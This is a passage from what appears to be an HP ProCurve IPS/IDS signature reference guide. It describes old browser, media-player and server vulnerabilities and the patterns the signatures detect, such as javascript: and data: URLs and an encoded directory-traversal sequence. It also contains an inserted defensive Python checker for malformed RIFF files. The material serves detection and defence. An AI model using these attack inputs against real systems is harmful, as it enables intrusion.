Signature Description: Channel Definition Format (CDF) is an XML standard used in conjunction with Microsoft Active Channel and Smart Offline Favorites technologies; it is used to define a web site's content and structure. Microsoft Internet Explorer contains a vulnerability in its handling of "channel" (CDF) files. The Active Channel data to be downloaded is specified in the CDF file in the form of a URL, and only the http, https and ftp protocols are allowed for downloading Active Channel data. The downloaded files are then properly scrutinized and executed in the context of the Internet security zone. However, Internet Explorer fails to perform proper validity checks on the URLs found in CDF files. A remote attacker could create a specially crafted URL link which, once clicked, would be executed in the victim's web browser within the security context of the Internet zone. An attacker could exploit this vulnerability by creating a malicious web page and hosting it on a web site or by sending it to a victim as an HTML email. Microsoft Internet Explorer versions 5.01 SP3 and SP4, 5.5 SP2, and 6 SP1 are affected.
Signature ID: 1437
Microsoft Internet Explorer Drag and Drop Events File Download Vulnerability
Threat Level: Severe
Industry ID: CVE-2005-0053 Bugtraq: 11466
Signature Description: Microsoft DHTML events are special actions provided by the DHTML Object Model. Drag-and-Drop technology incorrectly validates some dynamic HTML (DHTML) events. DHTML Drag-and-Drop events can manipulate windows to copy objects from one domain to another, including the Local Machine Zone. Microsoft Internet Explorer does not properly validate objects before placing them on the local machine when DHTML Drag-and-Drop events are used. This vulnerability permits a file to be downloaded to the user's system after the user clicks a link or drags and drops an object. An attacker who successfully exploited this vulnerability could cause an executable file to be saved on the user's system. A malicious HTML page or email can completely compromise a user's system by installing arbitrary files in the "Startup" folder, which are executed upon the next reboot. To exploit this vulnerability, an attacker would have to host a malicious web site containing a web page designed to exploit this vulnerability and then persuade a user to visit that site. Both MS05-008 and MS05-014 are required to completely patch this vulnerability.
Signature ID: 1438
Mozilla Firefox Favicon Link Tag Java Script Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-1155 Bugtraq: 13216
Signature Description: Firefox and the Mozilla Suite support custom "favicons" through the <LINK rel="icon"> tag. Browsers that support favicons display them in the browser's URL bar, next to the site's name in lists of bookmarks, and next to the page's title in a tabbed document interface. The link tag allows a custom image to be loaded as the icon for a web site. Mozilla user interface components such as toolbars, menu bars, progress bars, and window title bars can be modified using a script-based technology called Chrome. Mozilla executes a favicon link tag as a chrome script, and such scripts have elevated privileges: because of the extra privileges they can perform actions that web scripts cannot, and chrome scripts do not prompt for permission before executing potentially dangerous commands. Firefox versions prior to 1.0.3 and Mozilla Suite versions prior to 1.7.7 allow execution of JavaScript in the href attribute of the link tag. By setting the href attribute of the link tag to a javascript: URL, it is possible to call chrome functions and run arbitrary code without user interaction. Attackers could exploit this vulnerability by adding a favicon link tag containing a malicious JavaScript URL to a web page and then enticing a victim to visit the page. Successful exploitation enables attackers to execute arbitrary script code with elevated privileges or cause a denial of service.
Signature ID: 1439
Mozilla Suite And Firefox Search Plug-In JavaScript Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-1156 CVE-2005-1157 Bugtraq: 13211
Signature Description: Mozilla browsers provide a search plugin facility that presents search engine interfaces based on Apple's Sherlock files. To perform an Internet search, the Sherlock application sends query information to one or more Internet search sites; the information returned by the search sites is interpreted by the Sherlock application and then displayed. Firefox enables users to add a new search engine, or modify the existing search engine (Google, by default), by calling the sidebar.addSearchEngine() function and passing a Sherlock file (with the .src extension) to it. Mozilla Firefox versions prior to 1.0.3 and Mozilla Suite versions prior to 1.7.7 are vulnerable to cross-site scripting caused by improper sanitization of user-supplied Sherlock files. By creating a special Sherlock file it is possible to run JavaScript code in the security context of the currently active tab. This allows the creation of search engines that silently monitor all web sites displayed while searching (e.g. to steal session cookies) and/or that wait for a privileged page (e.g. chrome or about:config) in order to run arbitrary code, such as installing malicious software on the victim's machine.
Signature ID: 1440
Mozilla Firefox Sidebar Panel _search target Script Code Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-1158 Bugtraq: 13231
Signature Description: Mozilla Firefox is a free, open source, cross-platform graphical web browser. Firefox provides a facility to load web pages in a sidebar web panel, and sites can use the _search target (as in target="_search") to open links in the Firefox sidebar. A vulnerability exists in Mozilla Firefox versions prior to 1.0.3 caused by improper validation of user-supplied information in the processing of the sidebar _search target. By convincing a user to open a privileged page (such as 'about:config' or 'about:plugins') in the sidebar, an attacker can then use a 'javascript:' or 'data:' URL to access the privileged data or install arbitrary code on the victim's computer. Successful exploitation allows installation of malicious code or theft of data without user interaction. Administrators are advised to upgrade to a patched version. This signature detects the "java script:" pattern in the address tag.
Signature ID: 1441
Mozilla Firefox Sidebar Panel _search target Script Code Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-1158 Bugtraq: 13231
Signature Description: Mozilla Firefox is a free, open source, cross-platform graphical web browser. Firefox provides a facility to load web pages in a sidebar web panel, and sites can use the _search target (as in target="_search") to open links in the Firefox sidebar. A vulnerability exists in Mozilla Firefox versions prior to 1.0.3 caused by improper validation of user-supplied information in the processing of the sidebar _search target. By convincing a user to open a privileged page (such as 'about:config' or 'about:plugins') in the sidebar, an attacker can then use a 'javascript:' or 'data:' URL to access the privileged data or install arbitrary code on the victim's computer. Successful exploitation allows installation of malicious code or theft of data without user interaction. Administrators are advised to upgrade to a patched version. This signature detects the "data:text/plain" pattern in the address tag.
Signature ID: 1442
Microsoft Compressed HTML Help (CHM) File transfer attempt Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0002 CVE-2004-0380 Bugtraq: 2456,9658
Signature Description: Microsoft Compressed HTML Help is a proprietary format for online help files. Local and remote programs may distribute help information along with their application, expecting it to be launched by users when the programs are run. Several potential vulnerabilities exist in Microsoft Windows and Internet Explorer when accessing a CHM file. Microsoft Internet Explorer 5.0.1 SP1, 6.0, 5.5 SP2 and 5.5 SP1 may allow an attacker to learn the path of the Temporary Internet Files folder on a remote machine. Microsoft Internet Explorer 5.0.1 SP4, 5.0.1 SP3, 5.0.1 SP2, 5.0.1 SP1, 5.0.1, 6.0 SP1, 6.0, 5.5 SP2, 5.5 SP1, 5.5 preview and 5.5 may allow hostile content to be interpreted in the Local Zone. This signature therefore detects any .chm file transferred in an HTTP response when a user accesses external web sites. CHM files also have legitimate uses, and users can trust them when they come from trusted sources.
Signature ID: 1443
Mozilla IFRAME SRC Javascript Execution in the Context of Other Domain Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-1476 Bugtraq: 13544
Signature Description: An IFrame (Inline Frame) is an HTML element that makes it possible to embed another HTML document inside the main document. Mozilla browsers support IFRAME and use the same-origin security model to maintain separation between browser frames from different sources: Mozilla considers two pages to have the same origin if the protocol, port (if given), and host are the same for both pages. A window object represents an HTML page, so the main HTML page and its IFRAME page are represented by two separate window objects, but the window object of the IFRAME element can be accessed by a script in its parent window. For example, the main window can use the window.history property of an IFRAME window to navigate through its browsing history. A cross-site scripting vulnerability exists because Mozilla does not properly validate the source domain of some URLs stored in the browser history. When a user navigates through the browsing history of an IFRAME element that contains JavaScript code, Mozilla browsers do not update the window.location property correctly. An attacker can create a javascript: URI containing eval(), cause the user to visit a web site in a different domain, and then programmatically cause the web browser to return to the previous javascript: page to trigger the cross-domain violation. The violation also occurs if the user manually clicks the "Back" button to return to the javascript: page. This vulnerability can be used to steal cookies or other confidential data from the target site. When this attack is combined with CVE-2005-1477 it is possible to execute arbitrary code. This vulnerability is reported in all versions of Mozilla Firefox up to 1.0.3.
Signature ID: 1444
Mozilla Firefox Install Method IconURL Parameter Java Script Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-1477 Bugtraq: 13544
Signature Description: XPInstall is a cross-platform software installation method used by Mozilla-based browsers. By default, web browser extensions are installed from addons.mozilla.org and update.mozilla.org, and the installation of an extension can be initiated from script code. A vulnerability exists in Mozilla Firefox 1.0.3 which may execute JavaScript contained in the IconURL parameter of InstallTrigger.install() with chrome privileges. The IconURL parameter indicates the location of an icon image file to be displayed in the web browser, but it accepts JavaScript URLs (in-line JavaScript) as input; by using an eval() call in that URL, arbitrary code can be executed with elevated privileges. By default only the Mozilla Update site is allowed to attempt software installation, but users can allow other sites. By convincing a user to view an HTML document (e.g., a web page), an attacker could execute arbitrary commands or code with the privileges of the user. This vulnerability is reported in all versions of Mozilla Firefox up to 1.0.3. Upgrade to Firefox version 1.0.4 or later to address this issue.
Signature ID: 1446
Mozilla Firefox and Mozilla Suite Script Security Manager Security Check Bypass Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-1531 Bugtraq: 13641
Signature Description: Mozilla-based browsers have a Script Security Manager which imposes restrictions (security checks) on executing JavaScript for certain protocols such as HTTP and FTP. A vulnerability exists in Mozilla Firefox and Mozilla Suite when the view-source: and jar: pseudo-protocols are used. Some security checks in the Security Manager intended to prevent script injection were incorrect and could be bypassed by wrapping a javascript: URL in the view-source: or jar: pseudo-protocol. A remote attacker can create a specially crafted view-source: or jar: protocol URL embedding a malicious JavaScript URL which, once the victim loads it, would allow the attacker to execute arbitrary code on the system with the privileges of the victim. Mozilla Suite versions 1.x and below are prone to this vulnerability. Update the Mozilla Firefox suite to versions 2.x and above to resolve this issue.
Signature ID: 1447
MSIE JPEG Image Rendering Library Memory Corruption Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-1988 CVE-2005-2308 Bugtraq: 14282,14284,14285,14286
Signature Description: The image rendering library used to display JPEG files in Internet Explorer does not properly handle crafted JPEG images. The vulnerability specifically exists in mshtml.dll due to a lack of boundary checks in the JPEG decoder functions. A remote attacker can create a malicious JPEG image which, once viewed, could allow the attacker to execute arbitrary code on the system with the privileges of the victim or create a denial of service condition. An attacker could exploit this vulnerability by creating a malicious web page or an HTML e-mail message and then persuading the user to visit the page or view the message. Microsoft Internet Explorer versions 5.x from SP1 to SP4 are prone to this vulnerability. Administrators are advised to install the updates mentioned in MS05-038.
Signature ID: 1448
Microsoft Internet Explorer JPEG Image Rendering Library Memory Corruption Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-1988 CVE-2005-2308 Bugtraq: 14282,14284,14285,14286
Signature Description: The image rendering library used to display JPEG files in Internet Explorer does not properly handle crafted JPEG images. The vulnerability specifically exists in mshtml.dll due to a lack of boundary checks in the JPEG decoder functions. A remote attacker can create a malicious JPEG image which, once viewed, could allow the attacker to execute arbitrary code on the system with the privileges of the victim or create a denial of service condition. An attacker could exploit this vulnerability by creating a malicious web page or an HTML e-mail message and then persuading the user to visit the page or view the message. Microsoft Internet Explorer 5.x with SP1, SP2, SP3 or SP4 is prone to this vulnerability. Administrators are advised to install the updates mentioned in MS05-038.
Signature ID: 1449
RealNetworks RealPlayer vidplin.dll AVI file Processing Heap Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-2052 CVE-2008-0011 Bugtraq: 13530,29581
Signature Description: RealNetworks RealPlayer is a streaming audio and video player for Microsoft Windows platforms. RealPlayer is vulnerable to a heap overflow while processing specially crafted AVI files. The vulnerability specifically exists in vidplin.dll, which RealPlayer calls while processing AVI files. The Microsoft AVI file format is a RIFF file specification used by applications that capture, edit, and play back audio-video sequences; in general, AVI files contain multiple streams of different types of data. The stream format chunk (strf) describes the format of the data in the stream. RealPlayer relies on a value in the strf structure and allocates a fixed memory space of 0x428 bytes into which it copies the data of the strf chunk from the AVI file. Constructing a crafted AVI file with an strf chunk larger than 0x428 bytes and convincing a user to view the file in RealPlayer causes the overflow in vidplin.dll. The vulnerability allows a remote attacker to reliably overwrite heap memory with arbitrary data and execute arbitrary code in the context of the user who runs the player. RealNetworks RealPlayer versions prior to 10.5 have this vulnerability.
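The two AVI and WAV conditions described in signatures 1449 and 1428 (an strf chunk larger than the fixed 0x428-byte buffer, and a LIST INFO string whose NUL terminator lies beyond its declared length) can be checked on a file before it reaches a player. The following RIFF chunk walker is an added example, not code from the HP guide or from RealNetworks; the sample WAV and AVI files are constructed inline, and the 0x428 cap is taken from the signature text.

```python
"""RIFF chunk-length checker for WAV and AVI files (added example)."""
import struct

STRF_MAX = 0x428  # fixed buffer size the guide quotes for the strf chunk (signature 1449)


def iter_chunks(data, offset, end):
    """Yield (fourcc, payload_offset, declared_size) for the chunks in data[offset:end]."""
    while offset + 8 <= end:
        fourcc = data[offset:offset + 4]
        size = struct.unpack_from("<I", data, offset + 4)[0]
        yield fourcc, offset + 8, size
        offset += 8 + size + (size & 1)  # RIFF chunks are padded to an even length


def _check_info_strings(data, start, stop, findings):
    """LIST/INFO sub-chunks (INAM, IART, ICOP, ...) hold NUL-terminated text.

    A copy that runs until the terminator would read past a buffer sized
    from the declared length if the terminator is not inside it (signature 1428).
    """
    for fourcc, payload, size in iter_chunks(data, start, stop):
        text = data[payload:payload + size]
        if b"\x00" not in text:
            findings.append(f"INFO/{fourcc.decode('ascii', 'replace')}: {size}-byte "
                            "string has no NUL terminator inside its declared length")


def check_riff(data):
    """Return a list of findings; an empty list means the file passes both checks."""
    findings = []
    if len(data) < 12 or data[:4] != b"RIFF":
        return ["not a RIFF file"]
    total = struct.unpack_from("<I", data, 4)[0]
    end = min(len(data), 8 + total)

    def walk(start, stop):
        for fourcc, payload, size in iter_chunks(data, start, stop):
            name = fourcc.decode("ascii", "replace")
            if payload + size > len(data):  # declared size runs past the file
                findings.append(f"{name}: declares {size} bytes but only "
                                f"{len(data) - payload} remain in the file")
                size = len(data) - payload
            if fourcc == b"LIST":
                if data[payload:payload + 4] == b"INFO":
                    _check_info_strings(data, payload + 4, payload + size, findings)
                else:  # hdrl, strl, movi, ...: recurse into the nested chunks
                    walk(payload + 4, payload + size)
            elif fourcc == b"strf" and size > STRF_MAX:
                findings.append(f"strf: declared size {size:#x} exceeds the "
                                f"{STRF_MAX:#x}-byte buffer")

    walk(12, end)
    return findings


# --- constructed sample files (not real captures) ---------------------------
def chunk(fourcc, payload):
    pad = b"\x00" if len(payload) & 1 else b""
    return fourcc + struct.pack("<I", len(payload)) + payload + pad


def riff(form, body):
    return b"RIFF" + struct.pack("<I", 4 + len(body)) + form + body


FMT = struct.pack("<HHIIHH", 1, 1, 8000, 16000, 2, 16)  # PCM, mono, 8 kHz, 16-bit

# Well-formed WAV: the INAM string carries its NUL terminator.
GOOD_WAV = riff(b"WAVE", chunk(b"fmt ", FMT)
                + chunk(b"LIST", b"INFO" + chunk(b"INAM", b"Song\x00"))
                + chunk(b"data", b"\x00" * 8))

# WAV whose INAM string is not terminated within its declared 4 bytes.
BAD_WAV = riff(b"WAVE", chunk(b"fmt ", FMT)
               + chunk(b"LIST", b"INFO" + chunk(b"INAM", b"Song"))
               + chunk(b"data", b"\x00" * 8))

# AVI whose strf chunk declares 0x500 bytes, more than the 0x428-byte buffer.
BAD_AVI = riff(b"AVI ", chunk(b"LIST", b"hdrl"
               + chunk(b"avih", b"\x00" * 56)
               + chunk(b"LIST", b"strl"
                       + chunk(b"strh", b"\x00" * 56)
                       + chunk(b"strf", b"\x00" * 0x500))))

if __name__ == "__main__":
    for label, sample in (("good.wav", GOOD_WAV), ("bad.wav", BAD_WAV), ("bad.avi", BAD_AVI)):
        print(label, check_riff(sample) or "ok")
```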
Signature ID: 1450
ViRobot Linux Server addschup Binary Cookie Overflow vulnerability
Threat Level: Warning
Industry ID: CVE-2005-2041 Bugtraq: 13964 Nessus: 18494
Signature Description: ViRobot Linux Server is an anti-virus file server product that runs on Linux-based operating systems. ViRobot Linux Server is prone to a remote buffer overflow vulnerability affecting its web-based management interface. The problem is caused by improper bounds checking of cookies sent to the setuid cgi-bin file addschup; other binaries may also be affected. A remote attacker can exploit this vulnerability by sending the addschup binary a malicious request whose Cookie field contains the overflow string and arbitrary commands. Successful exploitation may insert arbitrary commands into the user's crontab file, causing them to be executed at regular intervals.
Signature ID: 1451
Microsoft DirectX DirectShow AVI File Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2005-2128 Bugtraq: 15063
Signature Description: Microsoft DirectShow is used for streaming media on Microsoft Windows operating systems and is integrated with the DirectX technologies. A buffer overflow vulnerability exists in the Microsoft Windows DirectShow component when processing AVI (Audio Video Interleave) media files. The Microsoft AVI file format is a RIFF file specification used by applications that capture, edit, and play back audio-video sequences; in general, AVI files contain multiple streams of different types of data. The stream name chunk (strn) contains a name for the stream. Windows Media Player uses QUARTZ.DLL (the DirectShow runtime library) to decode and play AVI movie files. An attacker could craft a malicious AVI file with a malformed stream name chunk (strn) and a special length field value; because DirectShow does not validate the chunk, QUARTZ can be made to store a null byte at an arbitrary memory location when the file is processed. This affects the heap management code, allowing an attacker to modify a heap block header and write a null byte, and other instructions, to arbitrary memory. Successful exploitation permits execution of arbitrary code in the context of the user who opens the malicious AVI file. Administrators are advised to install the patches mentioned in the MS05-050 bulletin.
Signature ID: 1452
Microsoft Windows Graphics Rendering Engine WMF/EMF Integer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-2123 Bugtraq: 15352
Signature Description: The Microsoft Windows Graphics Rendering Engine supports a number of image formats, including Windows Metafile (WMF) and Enhanced Metafile (EMF). WMF is a graphics file format on Microsoft Windows systems; it is a vector graphics format which also allows the inclusion of raster graphics. WMF is a 16-bit format introduced in Windows 3.0; the newer 32-bit version with additional commands is called Enhanced Metafile (EMF). A WMF/EMF file stores a list of function calls that are issued to the Windows graphics layer, GDI, in order to reproduce the image. The graphics rendering engine in Windows is vulnerable to several integer overflows while processing specially crafted WMF/EMF files. The flaw is due to improper validation of the header values in a WMF/EMF file: large header values can cause an integer overflow during the size calculation, and the resulting misrepresented integer may then be used to allocate stack space, producing a buffer overflow when the data is copied. An attacker could exploit this vulnerability by sending the malicious image to a victim as an email attachment and tricking the victim into opening it, or by hosting it on a web site and persuading the victim to visit the site.
Signature ID: 1453
Microsoft Windows Graphics Rendering Engine WMF/EMF Integer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-2123 Bugtraq: 15352
Signature Description: The Microsoft Windows Graphics Rendering Engine supports a number of image formats, including Windows Metafile (WMF) and Enhanced Metafile (EMF). WMF is a graphics file format on Microsoft Windows systems; it is a vector graphics format which also allows the inclusion of raster graphics. WMF is a 16-bit format introduced in Windows 3.0; the newer 32-bit version with additional commands is called Enhanced Metafile (EMF). A WMF/EMF file stores a list of function calls that are issued to the Windows graphics layer, GDI, in order to reproduce the image. The graphics rendering engine in Microsoft Windows 2000 SP4, 2003 SP1, XP SP2 and prior service packs is vulnerable to several integer overflows while processing specially crafted WMF/EMF files. The flaw is due to improper validation of the header values in a WMF/EMF file: large header values can cause an integer overflow during the size calculation, and the resulting misrepresented integer may then be used to allocate stack space, producing a buffer overflow when the data is copied. An attacker could exploit this vulnerability by sending the malicious image to a victim as an email attachment and tricking the victim into opening it, or by hosting it on a web site and persuading the victim to visit the site.
Signature ID: 1454
Microsoft Windows Client/Server Runtime Server Subsystem Stack Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-2118 CVE-2005-2122 CVE-2005-0551 Bugtraq: 15069,15070,13115
Signature Description: The Win32 application programming interface (API) offers a console windows feature that provides a means to implement command-line and other character-based user interfaces. Console windows are managed by the Client/Server Runtime Server subsystem (csrss.exe), specifically by code inside winsrv.dll. This module handles the creation of console windows and their associated properties, such as size, font and color. Console window properties can be set by selecting Properties on the window's system menu, setting the desired values and then saving the changes. When a user selects the "Properties" item from the menu of a console window, a data structure called CONSOLE_STATE_INFO containing information about the console window is copied into a file-mapping object. The CONSOLE_STATE_INFO structure contains a null-terminated string specifying the name of a font, FaceName[32]. This string is copied into a fixed-size stack buffer via the wcscpy() function without any sanity checking. By supplying a string longer than 32 bytes, an attacker can trigger the stack-based buffer overflow, gain control of the computer and eventually execute arbitrary code. A local, authenticated attacker could run a specially crafted application to gain elevated privileges and complete control of the system. A remote attacker can exploit this issue by crafting a malicious shortcut (.lnk) file, placing it on a web site or sending it to a user through email, and then enticing the user to open it and view the file's properties.
Signature ID: 1455
Mozilla Firefox 'Set As Wallpaper' Javascript Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-2262 CVE-2005-2260 Bugtraq: 14242
Signature Description: Mozilla is an open-source web browser for Microsoft Windows and Linux-based operating systems. Mozilla Firefox versions 1.0.3 and 1.0.4 could allow a remote attacker to execute arbitrary code because of a vulnerability in the "Set As Wallpaper" context menu. The "Set As Wallpaper" dialog takes the image URL as a parameter without validating it. If an attacker can convince a victim to use the "Set As Wallpaper" context menu item on a specially crafted image whose source is a javascript: URL (like <img src="javascript:) containing an eval() statement, the attacker can run arbitrary code on the user's computer. Users are advised to upgrade to a newer version of Mozilla Firefox. This vulnerability has been addressed in Firefox 1.0.5 and in Mozilla Suite 1.7.9.
Signature ID: 1456
NullSoft Winamp ID3v2 Tag Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2005-2310 Bugtraq: 14276
Signature Description: Winamp is a multimedia player made by Nullsoft. ID3v2 is a metadata container most often used in conjunction with the MP3 audio file format. It allows information such as the title, artist, album, track number, or other information about the file to be stored in the file itself. Winamp versions 5.03a, 5.09, and 5.091 are reported to be vulnerable to a buffer overflow when processing the ID3v2 tags of MP3 files. A remote attacker can create an MP3 file with a malicious ID3v2 tag, such as ARTIST (TPE1), that specifies a large string. When the target user adds the file to their Winamp playlist and plays it, arbitrary code is executed when the file finishes playing. Users are advised to upgrade to the newer version of Winamp. Other versions are also likely affected.
Signature ID: 1457
NullSoft Winamp ID3v2 Tag Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2005-2310 Bugtraq: 14276
Signature Description: Winamp is a multimedia player made by Nullsoft. ID3v2 is a metadata container most often used in conjunction with the MP3 audio file format. It allows information such as the title, artist, album, track number, or other information about the file to be stored in the file itself. Nullsoft Winamp 5.0.91 and prior versions are vulnerable to a buffer overflow when processing the ID3v2 tags of MP3 files. A remote attacker can create an MP3 file with malicious ID3v2 tags, such as ARTIST (TPE1) or TITLE (TOPE), that specify a large string. When the target user adds the file to their Winamp playlist and then plays it, arbitrary code is executed when the file finishes playing. Users are advised to upgrade to the newer version of Winamp.
213
ProCurve TMS zl Module IPS/IDS Signature
Reference Guide Version RLX.10.2.2.94
Signature ID: 1458
Microsoft Internet Explorer CHM File Execution via URL specified for ShowHelp Method
Vulnerability
Threat Level: Warning
Industry ID: CVE-2003-1014 CVE-2004-0475 CVE-2004-0201 CVE-2003-1041 Bugtraq: 9320,10348,10705
Signature Description: Microsoft Internet Explorer is vulnerable to a file execution vulnerability that may permit unauthorized execution of locally stored compiled help files (.CHM). The ShowHelp() method is used to launch a Help file with the local HTML Help Windows application. The vulnerability specifically exists in the ShowHelp() function, which can reference local compiled help files without restriction. By making use of other vulnerabilities, a remote attacker can plant a .CHM file on the victim's machine, and that file can then be executed with the help of this vulnerability. This vulnerability can be exploited by constructing a Web page that references the already planted .CHM file through the ShowHelp method, which takes the help file as an argument. The location of the CHM file can be passed to the ShowHelp method using a URL of the form ms-its: or mk:@MSITStore:. It is also possible to refer to the CHM file using directory traversal techniques and special syntax. Exploitation of this vulnerability would require the user to visit a malicious Web site or otherwise visit a crafted URL and then take several interactive steps. Administrators are advised to install the updates mentioned in MS04-023.
Signature ID: 1459
Microsoft Internet Explorer InstallEngineCtl SetCifFile Argument Buffer Overflow
Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-0216 Bugtraq: 11366
Signature Description: Active Setup technology in Microsoft Internet Explorer allows an installation program to receive additional files from the Internet that are needed for program initialization. The Install Engine ActiveX control (inseng.dll), which is part of the Active Setup technology, contains a buffer overflow. The Active Setup Controls ActiveX component 'asctrls.ocx' provides the properties BaseUrl and SetCifFile. BaseUrl takes one argument, the path where downloaded components, including cabinet files, are found; SetCifFile takes two arguments, a cabinet file and a component information file, to set the component information file (.cif). When the SetCifFile() method is called with a first parameter (the '.cab' file name) longer than about 2 KB, an integer overflow occurs when calculating the buffer space allowed for copying the base URL. This also leads to a heap-based overflow when the string provided as the first parameter is concatenated onto the end of the BaseUrl. Successful exploitation could execute arbitrary code with the privileges of the user logged on to the target machine. An attacker could exploit this vulnerability by hosting the malicious Web page on a Web site or by sending it to a victim as an HTML email. Administrators are advised to install the updates mentioned in MS04-038; alternatively, users can set the kill bit for CLSID 6E449683-C509-11CF-AAFA-00AA00B6015C to resolve this issue.
Signature ID: 1460
Microsoft Internet Explorer InstallEngineCtl SetCifFile Argument Buffer Overflow
Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-0216 Bugtraq: 11366
Signature Description: Active Setup technology in Microsoft Internet Explorer allows an installation program to receive additional files from the Internet that are needed for program initialization. The Install Engine ActiveX control (inseng.dll), which is part of the Active Setup technology, contains a buffer overflow. The Active Setup Controls ActiveX component 'asctrls.ocx' provides the properties BaseUrl and SetCifFile. BaseUrl takes one argument, the path where downloaded components, including cabinet files, are found; SetCifFile takes two arguments, a cabinet file and a component information file, to set the component information file (.cif). A .cif file specifies all the files needed to install or update the software. When the SetCifFile() method is called with a first parameter (the '.cab' file name) longer than about 2 KB, an integer overflow occurs when calculating the buffer space allowed for copying the base URL. This also leads to a heap-based overflow when the string provided as the first parameter is concatenated onto the end of the BaseUrl. Successful exploitation could execute arbitrary code with the privileges of the user logged on to the target machine. An attacker could exploit this vulnerability by hosting the malicious Web page on a Web site or by sending it to a victim as an HTML email. Administrators are advised to install the updates mentioned in MS04-038.
Signature ID: 1461
Microsoft Internet Explorer ShowModalDialog Security Zone Bypass Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-0549 Bugtraq: 10472,10473
Signature Description: Internet Explorer security zones are part of a system that divides online content into categories, or zones, based on the trustworthiness of the content. Specific Web domains can be assigned to a zone, depending on how much trust is placed in the content of each domain. The zone then restricts the capabilities of the Web content, based on the zone's policy. By exploiting this vulnerability, JavaScript can be injected and executed within the victim's "My Computer" security zone. An IFRAME object is created for a Web page, which then changes its security zone by making use of the Location: weakness. When the location of the content of a frame is changed with an HTTP redirect response, a modal dialog box that was called from the frame before the redirect returns a cached reference to the frame's original domain. IE then incorrectly uses the cached domain instead of the redirected domain when determining the security domain of the modal dialog box. Also, since the contents of the frame have been changed by the redirect, it is possible to set the location object of the frame. By redirecting to a local resource, controlling the timing of the redirect, and setting the frame's location to a javascript: protocol URL, an attacker can execute script in the security context of the Local Machine Zone. The Scob, Download.Ject, Toofeer, Berbew, and IE ILookup Trojans make use of this vulnerability to affect systems. Administrators are advised to install the updates mentioned in MS04-025.
Signature ID: 1462
RealNetworks RealOnePlayer and RealPlayer PNen3260.DLL Integer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-1481 Bugtraq: 11309
Signature Description: RealPlayer is an application for playing various media formats, developed by RealNetworks Inc. RealPlayer 10.5 and prior versions are vulnerable to arbitrary code execution. An integer overflow vulnerability exists in pnen3260.dll, which handles .rm files in RealPlayer. The vulnerability is triggered by setting the length field of the VIDORV30 data chunk to a large value. Remote attackers could exploit this vulnerability to execute arbitrary code on an affected system by enticing a victim to play a specially crafted SMIL file that contains a link to a malicious .rm file. Users are advised to upgrade to a newer version of RealPlayer.
Signature ID: 1463
Winamp Fasttracker 2 Plug-In in_mod.dll Overflow Vulnerability
Threat Level: Information
Industry ID: CVE-2004-1896 Bugtraq: 10045
Signature Description: This rule is triggered when an attempt is made to download Extended Module files (.XM) from the Internet. NullSoft Winamp versions 5.02 and prior are vulnerable to a heap overflow while processing an XM media file. The vulnerability specifically exists in the 'in_mod.dll' component, which is responsible for loading XM files. By creating a specially crafted XM file with fields containing long values and convincing a user to load the file in Winamp, an attacker can overflow a buffer and execute arbitrary code. Users are advised to upgrade to a newer version of Winamp.
Signature ID: 1501
Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
Threat Level: Information
Industry ID: CVE-2002-0661 Bugtraq: 5434 Nessus: 11092
Signature Description: A vulnerability in the default installation of Apache HTTP Server versions 2.0 through 2.0.39 could allow a remote attacker to traverse directories on the Web server and view and execute files. A remote attacker could create a specially crafted URL request containing hexadecimal URL-encoded "backslash dot dot" sequences (in the form %5c%2e%2e%5c) to traverse directories and view arbitrary files and directories on the Web server. An attacker could use this vulnerability to execute commands on the system by traversing to the /cgi-bin/ directory.
Signature ID: 1502
Squid cachemgr.cgi Unauthorized Connection Vulnerability
Threat Level: Information
Industry ID: CVE-1999-710 CVE-1999-0710 Bugtraq: 2059
Signature Description: Squid is a high-performance proxy caching server for web clients, supporting FTP, gopher, and HTTP data objects. The 'cachemgr.cgi' module is a management interface for the Squid proxy service. Red Hat Linux 5.2 and 6.0 installed it by default in '/cgi-bin' along with Squid, with no access controls, allowing a remote attacker to connect to arbitrary hosts and ports and to use the server as an intermediary for connecting to other systems.
Signature ID: 1503
Cart32 "expdate" Administrative Information Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0430 Bugtraq: 1358
Signature Description: Cart32 is shopping cart software (developed by McMurtrey/Whitaker & Associates) built for Microsoft servers using Visual Basic, a MySQL database, and HTML components. A vulnerability in the cart32.exe CGI executable could allow a remote attacker to retrieve sensitive information about the server installation, including environment settings and a list of programs in the CGI-BIN directory. A remote attacker could exploit this vulnerability by appending the string "/expdate" to a request for the cart32.exe CGI, which returns an error message followed by a debugging page containing the server variables, the Cart32 administration directory and possibly the contents of the cgi-bin. Vulnerable versions are McMurtrey/Whitaker & Associates Cart32 3.0 and 2.6. No remedy was available as of August 2008.
Signature ID: 1504
Microsoft Internet Explorer FILEX Information Disclosure Vulnerability
Threat Level: Information
Signature Description: Filex (File Extension Database) consists of file name extension-related information in the form of a Windows HTML Help file. The Internet Explorer 5.0 browser is vulnerable. Because of improper request handling, sensitive information may be leaked when the file is accessed from Internet Explorer. Successful exploitation of this vulnerability allows an attacker to gain sensitive information from the vulnerable system. This vulnerability is fixed in the latest versions. Administrators are advised to update to the latest version to resolve this issue.
Signature ID: 1506
Microsoft Windows HTML Converter HR Align Buffer Overflow Vulnerability
Threat Level: Information
Industry ID: CVE-2003-0469 Bugtraq: 8016
